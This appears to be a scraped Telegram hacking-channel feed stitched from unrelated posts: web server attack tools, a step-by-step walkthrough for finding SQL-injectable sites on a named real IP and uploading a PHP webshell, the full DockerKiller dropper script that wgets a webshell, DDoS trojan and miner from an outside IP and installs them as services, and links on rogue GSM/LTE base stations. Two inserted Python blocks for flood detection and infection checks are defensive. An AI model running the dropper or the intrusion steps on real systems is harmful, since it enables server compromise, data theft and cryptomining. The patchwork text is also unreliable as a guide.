UNDERCODE COMMUNITY
🦑 Undercode World!
@UndercodeCommunity

1️⃣ World's first platform that collects & analyzes every new hacking method.
+ Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Youtube.com/Undercode
by Undercode.help
🦑 Web server attack tools

Some common Web server attack tools include:

1) Metasploit - an open source framework for developing, testing and using exploit code. It can be used to discover vulnerabilities in Web servers and to write exploits that compromise them.

2) MPack - a web exploitation tool written in PHP, with MySQL as its database engine. Once a web server has been compromised with MPack, all traffic to it is redirected to malicious download sites.

3) Zeus - turns infected computers into bots ("zombies"). A zombie is an infected computer used to carry out Internet-based attacks; a botnet is a collection of such computers, which can then be used for denial-of-service attacks or for sending spam.

4) Neosplit - can be used to install, delete and copy programs.

> All posted on @UndercodeTesting, and you can install new updates.
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to avoid attacks on Web servers

> Organizations such as undercode can adopt the following strategies to protect themselves against Web server attacks.

1) Patch management - installing patches to help protect the server. Patches are updates that fix bugs in the software; they apply to the operating system as well as to the Web server software.

2) Install and configure the operating system securely.

3) Install and configure the Web server software securely.

4) Vulnerability scanning - using tools such as Snort, Nmap and Scanner Access Now Easy (SANE).

5) Firewall - by blocking all traffic from the attacker's identified source IP address, the firewall can be used to stop simple DoS attacks.

6) Antivirus software can be used to remove malware from the server.

7) Disable remote management.

8) Default accounts and unused accounts must be deleted from the system.

9) Default ports and settings (such as FTP on port 21) should be changed to custom ports and settings (for example, FTP on port 5069).

@UndercodeTesting
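The firewall tip above assumes the attacker's source IP has already been identified. The following is an added example, not code from the original post, of how that identification step can be done from the server's own access log: it parses combined-format log lines, finds clients whose request rate inside a sliding window exceeds a threshold, and renders the matching iptables DROP rules as strings for an operator to review. The log lines are constructed sample data, and the window size and threshold are assumptions to tune per site.

```python
"""Rate-based detection of a single-source request flood in web server access logs.

Added example (not code from the original post): it turns the "block all traffic
from the attacker's identified source IP" tip into a detection step that names
the source first. The log lines are constructed sample data in Apache/Nginx
combined format; the window and threshold are assumptions to tune per site.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined-log-format prefix: only the client IP and the request timestamp are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime) for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FORMAT)


def flood_sources(lines, window_seconds=10, threshold=50):
    """Map each client IP to its peak request count inside any sliding window of
    `window_seconds`, keeping only clients whose peak exceeds `threshold`."""
    per_ip = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, ts = parsed
            per_ip[ip].append(ts)
    window = timedelta(seconds=window_seconds)
    offenders = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            offenders[ip] = peak
    return offenders


def block_rules(offenders):
    """Render one iptables DROP rule per offending source (strings only; nothing is executed)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(offenders)]


def sample_log():
    """Constructed sample: 203.0.113.7 sends 120 requests in 6 s, two other clients browse normally."""
    base = datetime(2020, 5, 20, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset_ms, path):
        ts = (base + timedelta(milliseconds=offset_ms)).strftime(TS_FORMAT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'

    lines = [line("203.0.113.7", i * 50, "/index.php") for i in range(120)]
    lines += [line("198.51.100.4", i * 2000, "/about.html") for i in range(8)]
    lines += [line("192.0.2.9", i * 5000, "/contact") for i in range(4)]
    return lines


if __name__ == "__main__":
    found = flood_sources(sample_log())
    for ip, peak in found.items():
        print(f"{ip}: {peak} requests in a 10 s window")
    print("\n".join(block_rules(found)))
```

The rules are returned rather than applied so that a human (or a change-controlled tool) decides what to block; a shared NAT address or a monitoring probe can exceed a naive threshold, which is why the threshold and window are parameters rather than constants.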

🦑 Information gathering

1) We need to get the target's IP address and find other sites that share the same IP address.

2) We will use an online tool to find the target's IP address and the other websites hosted on the same IP address.

3) Enter the URL http://www.yougetsignal.com/tools/web-sites-on-web-server/ in a web browser and enter http://www.techpanda.org as the target.

4) Based on the above results, the target's IP address is 69.195.124.112.

5) We also found 403 domains on the same web server. Our next step is to scan the other sites for SQL injection vulnerabilities. Note: if we can find a SQL injection vulnerability on the target itself, we will use it directly without considering the other websites.

6) Enter the URL http://www.bing.com in a web browser. This only works with Bing, so don't use other search engines such as Google or Yahoo. Enter the following search query:
ip:69.195.124.112 .php?id=

7) "ip:69.195.124.112" limits the search to all websites hosted on the web server with IP address 69.195.124.112; ".php?id=" searches for URLs whose GET variable is used as a parameter of a SQL statement. You will get the following result.

8) As can be seen from the above results, all websites that use GET variables as SQL injection parameters are listed.

9) The next logical step is to scan the listed websites for SQL injection vulnerabilities. You can do this manually or with the SQL injection tools listed in this article.

10) Uploading the PHP shell: we will not scan any of the websites listed because this is illegal. We assume that we have managed to log into one of them. You must upload the PHP shell downloaded from http://sourceforge.net/projects/icfdkshell/.

11) Open the URL of the uploaded dk.php file.

12) Clicking the symbolic link URL will allow you to access the files in the target domain.

13) Once you can access these files, you can get the database login credentials and perform any operation you want, such as defacement or downloading data such as emails.

🦑 So we secure our servers in undercode using those tips, plus a few more, which I will present as a summary:

1) Web servers store valuable information and are reachable from the public Internet. This makes them targets for attackers.

2) Commonly used Web servers include Apache and Internet Information Services (IIS).

3) Attacks on web servers take advantage of bugs and misconfigurations in the operating system, the web server software and the network. Popular web server hacking tools include Neosploit, MPack and ZeuS.

4) A good security strategy reduces the likelihood of being attacked.

🦑 Now we are preparing a new hosting service in undercode for online users, with good prices, in 2 months, and will send the site details.

@UndercodeTesting
🦑 More tips, with pictures: server cracking
🦑 WHAT IS DockerKiller:

> Recently, the Alibaba Cloud security team discovered the first instance of mass attacks on Docker and exploitation of the compromised hosts. After the attack, the attacker used an IRC backdoor and a webshell to achieve persistence, and performed mining, DDoS and other malicious actions on the host. As the cost of the attack-and-defence confrontation gradually increases, such attacks may in future become more and more direct, and their ways of cashing out will also multiply. It is recommended that enterprises strengthen the management of their edge applications and prevent threats caused by improper configuration.

> Docker is an open source application container engine that allows developers to package their applications and dependencies into a portable container and publish it to any popular Linux machine for virtualization. Because of its excellent portability, Docker is widely used for simplified configuration, rapid deployment and multi-tenant environments, has gradually moved into production environments, and is widely deployed in the cloud.


🦑 The function execution sequence is:

1) Clean up related files: delete old versions of the mining and DDoS Trojans, their services and their configuration files.

2) Download related files: download the webshell backdoor, the DDoS Trojan and the mining program, and execute them.

3) Open related services: start the mining and DDoS Trojan services.

🦑 The relevant code is as follows:

#!/bin/sh
rm bashd.1;
rm xm.1;
rm data.cfg.1;
rm bashd.service.1;
rm xm.service.1;
wget http://159.203.21.239/p/p.php -O privacy.php | sed 's/\r//g';
cp privacy.php /var/www/html/privacy.php;
cp privacy.php /var/www/privacy.php;
rm privacy.php;
chmod -R 777 /var/www;
wget http://159.203.21.239/p/bashd -O bashd | sed 's/\r//g';
wget http://159.203.21.239/p/xm -O xm | sed 's/\r//g';
wget http://159.203.21.239/p/data.cfg -O data.cfg | sed 's/\r//g';
wget http://159.203.21.239/p/bashd.service -O bashd.service | sed 's/\r//g';
wget http://159.203.21.239/p/xm.service -O xm.service | sed 's/\r//g';
sleep 2s;
chmod 777 bashd;
chmod 777 xm;
sleep 2s;
mv "bashd.service" "/etc/systemd/system/bashd.service";
mv "xm.service" "/etc/systemd/system/xm.service";
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl stop xm.service;
systemctl enable bashd.service;
systemctl start bashd.service;
systemctl enable xm.service;
systemctl start xm.service;

🦑 Safety advice from undercode against DockerKiller:

1. Modify the default parameters of the Docker Remote API service (a service restart is required):

(1) Locate tcp://0.0.0.0:2375 in DOCKER_OPTS and change 0.0.0.0 to 127.0.0.1

(2) Or change the default port 2375 to a custom port

2. Set up authentication for the Remote API (requires a service restart)

3. Change the account the Docker service runs as (a service restart is required)

Run the Docker service under a lower-privilege account; this restricts the attacker from executing high-risk commands.

4. Set a firewall policy

If the API service needs to be accessed by other servers for normal business, configure the security group policy or the iptables policy to allow only the specified IPs to reach the Docker interface.

5. Use Alibaba Cloud Shield for detection and protection

Cloud Shield situational awareness supports the detection and protection of this vulnerability; you can enable and use it in the Cloud Shield console.

@UndercodeTesting
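The advice above targets the exposed Remote API, and the script earlier in this post lists the files it drops. The following is an added example, not code from the original post or from Alibaba Cloud, that turns both into a host check: it audits the Docker daemon listen configuration (DOCKER_OPTS `-H`/`--host` values and the `hosts` key of daemon.json) for wildcard TCP binds such as tcp://0.0.0.0:2375, and it looks for the persistence artifacts named in the script (the bashd.service and xm.service units, the privacy.php webshell, a world-writable /var/www). File locations are parameters so the check can be run against a test tree; `build_sample_tree` is a constructed fixture, not data from a real host.

```python
"""Host check for the DockerKiller exposure and persistence artifacts described above.

Added example, not code from the original post or from Alibaba Cloud. It does two
things: (a) audits the Docker daemon listen configuration for the exposed Remote
API (tcp://0.0.0.0:2375 in DOCKER_OPTS or "hosts" in daemon.json), and (b) looks
for the artifacts the script above leaves behind (bashd/xm systemd units, the
privacy.php webshell, a world-writable /var/www). Every location is a parameter so
the check can be pointed at a test tree; the defaults are the usual system paths.
"""
import json
import os
import re
import stat

# Wildcard binds of the TCP listener: reachable from every interface.
WILDCARD_TCP = re.compile(r"^tcp://(0\.0\.0\.0|\[::\]|::)(:\d+)?$")
PERSISTENCE_UNITS = ("bashd.service", "xm.service")   # unit names from the script above
WEBSHELL_NAMES = ("privacy.php",)                     # webshell file name from the script above


def docker_listeners(docker_opts="", daemon_json_text=""):
    """Collect every listen address from DOCKER_OPTS (-H / --host) and daemon.json "hosts"."""
    hosts = re.findall(r"""(?:-H|--host)[= ]+([^\s"']+)""", docker_opts)
    if daemon_json_text.strip():
        try:
            hosts += json.loads(daemon_json_text).get("hosts", [])
        except ValueError:
            pass  # unparsable daemon.json: nothing more to learn from it
    return hosts


def exposed_listeners(hosts):
    """Return the listen addresses that bind the Remote API on all interfaces."""
    return [h for h in hosts if WILDCARD_TCP.match(h)]


def persistence_artifacts(systemd_dir="/etc/systemd/system",
                          web_roots=("/var/www/html", "/var/www")):
    """Return human-readable findings for the unit files, webshell and permissions
    the DockerKiller script installs."""
    findings = []
    for unit in PERSISTENCE_UNITS:
        path = os.path.join(systemd_dir, unit)
        if os.path.exists(path):
            findings.append(f"systemd unit present: {path}")
    for root in web_roots:
        for name in WEBSHELL_NAMES:
            path = os.path.join(root, name)
            if os.path.exists(path):
                findings.append(f"webshell candidate: {path}")
        if os.path.isdir(root) and os.stat(root).st_mode & stat.S_IWOTH:
            findings.append(f"world-writable web root: {root}")
    return findings


def audit_host(env_file="/etc/default/docker", daemon_json="/etc/docker/daemon.json"):
    """Run both checks against the live host (reads the real config files if present)."""
    opts = open(env_file).read() if os.path.exists(env_file) else ""
    cfg = open(daemon_json).read() if os.path.exists(daemon_json) else ""
    return {
        "exposed_api": exposed_listeners(docker_listeners(opts, cfg)),
        "artifacts": persistence_artifacts(),
    }


def build_sample_tree():
    """Constructed fixture: a temporary tree laid out like an infected host, for the demo."""
    import tempfile
    base = tempfile.mkdtemp(prefix="dockerkiller-demo-")
    systemd_dir = os.path.join(base, "etc", "systemd", "system")
    web_root = os.path.join(base, "var", "www", "html")
    os.makedirs(systemd_dir)
    os.makedirs(web_root)
    open(os.path.join(systemd_dir, "xm.service"), "w").close()
    open(os.path.join(web_root, "privacy.php"), "w").close()
    os.chmod(web_root, 0o777)      # mirrors the script's chmod -R 777 /var/www
    return systemd_dir, (web_root,)


if __name__ == "__main__":
    print(audit_host())
```

A loopback bind (tcp://127.0.0.1:2375) or a Unix socket is not flagged, matching advice item 1; a wildcard bind on a custom port is still flagged, because moving the port (item 1(2)) only hides the API from naive scans and should be combined with the firewall policy of item 4.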
🦑 ALL YOU NEED TO KNOW ABOUT DOCKER-KILLER
Forwarded from PRIVATE UNDERCODE

🦑 Wolf malware launches attack again

> Android device users are being attacked by "WolfRAT", an upgraded version of DenDroid. It currently targets mainly social apps such as WhatsApp, Facebook Messenger and Line.

» The upgraded version is mainly operated by the infamous Wolf Research. Its operational level is quite amateurish: overlapping code, copy-and-paste from open source projects, class instantiation, unstable program packaging and unsafe panel operation.

🦑 Operation process
The malware imitates legitimate service processes, such as Google services, Google Play or Flash updates. Its operation consists mostly of large amounts of public code copied and pasted from the Internet.

🦑 The consequences

> After being publicly condemned by the Danish threat intelligence company CSIS Group, Wolf Research was closed, but a new organisation called LokD was established, which is dedicated to the security protection of Android devices. However, because of the shared devices and the panel name that was never changed, we believe the organisation's hackers are still active and still developing malware.

> In addition, on the C2 panel we also found a potential connection between Wolf Research and another Cyprus organisation called Coralco Tech, which also conducts technical interception research.

@UndercodeTesting

🦑 News by Undercode > Vulnerabilities in various DNS resolvers found to allow attackers to launch denial of service attacks:
t.me/UndercodeTesting

1) A vulnerability in DNS resolvers allows attackers to create denial of service conditions through packet amplification. The vulnerability is called NXNSAttack. The attacker abuses the DNS delegation mechanism: the delegation it sends contains only the names of the authoritative DNS servers, not their IP addresses.

2) A DNS resolver cannot send a query to a name, so it must first obtain the IPv4 or IPv6 address of the authoritative DNS server before it can continue resolving the domain.

3) NXNSAttack is based on this principle. The delegation sent by the attacker contains fake authoritative server names pointing at the victim's DNS server, forcing the resolver to generate queries to the victim's DNS server. A single query is amplified dozens or even hundreds of times, creating a denial of service against the victim's server.

4) Many DNS implementations are affected, including ISC BIND (CVE-2020-8616), NLnet Labs Unbound (CVE-2020-12662), PowerDNS (CVE-2020-10995), CZ.NIC Knot Resolver (CVE-2020-12667), as well as Cloudflare, Google, Amazon, Microsoft, Oracle (DYN), Verisign, IBM Quad9 and ICANN. ☠️☠️

@UndercodeTesting

🦑 Awesome-Cellular-Hacking - from a random GitHub repo tip:

1) How to create an Evil LTE Twin / LTE Rogue BTS: how to set up a 4G/LTE Evil Twin base station using srsLTE and a USRP SDR device.
https://medium.com/@adam.toscher/how-to-create-an-evil-lte-twin-34b0a9ce193b

2) How To Build Your Own Rogue GSM BTS For Fun and Profit: "In this blog post I’m going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking … yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception."
https://www.evilsocket.net/2016/03/31/how-to-build-your-own-rogue-gsm-bts-for-fun-and-profit/

3) Practical attacks against GSM networks: Impersonation: "Impersonating a cellular base station with SDR: With the flexibility, relative low cost of Software Defined Radio (SDR) and abundance of open source projects that emulate a cell tower, successfully impersonating a GSM Base Station (BTS) is not a difficult task these days."
https://blog.blazeinfosec.com/practical-attacks-against-gsm-networks-part-1/

4) Building a Portable GSM BTS Using BladeRF/PI: "I was always amazed when I read articles published by some hackers related to GSM technology. However, playing with GSM technologies was not cheap until the arrival of Software Defined Radios (SDRs), besides not being something easy to be implemented."
https://blog.strcpy.info/2016/04/21/building-a-portable-gsm-bts-using-bladerf-raspberry-and-yatebts-the-definitive-guide/

5) rtl-sdr.com tutorial - Analyzing GSM with Airprobe and Wireshark: "The RTL-SDR software defined radio can be used to analyze cellular phone GSM signals, using Linux based tools GR-GSM (or Airprobe) and Wireshark. This tutorial shows how to set up these tools for use with the RTL-SDR."
https://www.rtl-sdr.com/rtl-sdr-tutorial-analyzing-gsm-with-airprobe-and-wireshark/

6) Traffic Interception for Penetration Testing Engagements: "Within the penetration testing domain quite often we have to deal with different technologies and devices. It’s important to cover all aspects of connectivity of a device being tested which is why we have built a GSM/GPRS interception capability. There are a number of different devices and systems that make use of GSM/GPRS, non-exhaustively we commonly see:"
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/may/gsmgprs-traffic-interception-for-penetration-testing-engagements/


🦑 Installing a USRP device on Linux:

1) sudo add-apt-repository ppa:ettusresearch/uhd

2) sudo apt-get update

3) sudo apt-get install libuhd-dev libuhd003 uhd-host

4) uhd_find_devices

5) cd /usr/lib/uhd/utils/

6) ./uhd_images_downloader.py

7) sudo uhd_usrp_probe

8) Example output:

[INFO] [UHD] linux; GNU C++ version 7.4.0; Boost_106501; UHD_3.14.1.1-release
[INFO] [B200] Detected Device: B*****
[INFO] [B200] Operating over USB 3.
[INFO] [B200] Initialize CODEC control...
[INFO] [B200] Initialize Radio control...
[INFO] [B200] Performing register loopback test...
[INFO] [B200] Register loopback test passed
[INFO] [B200] Setting master clock rate selection to 'automatic'.
[INFO] [B200] Asking for clock rate 16.000000 MHz...
[INFO] [B200] Actually got clock rate 16.000000 MHz.
_____________________________________________________
/
| Device: B-Series Device

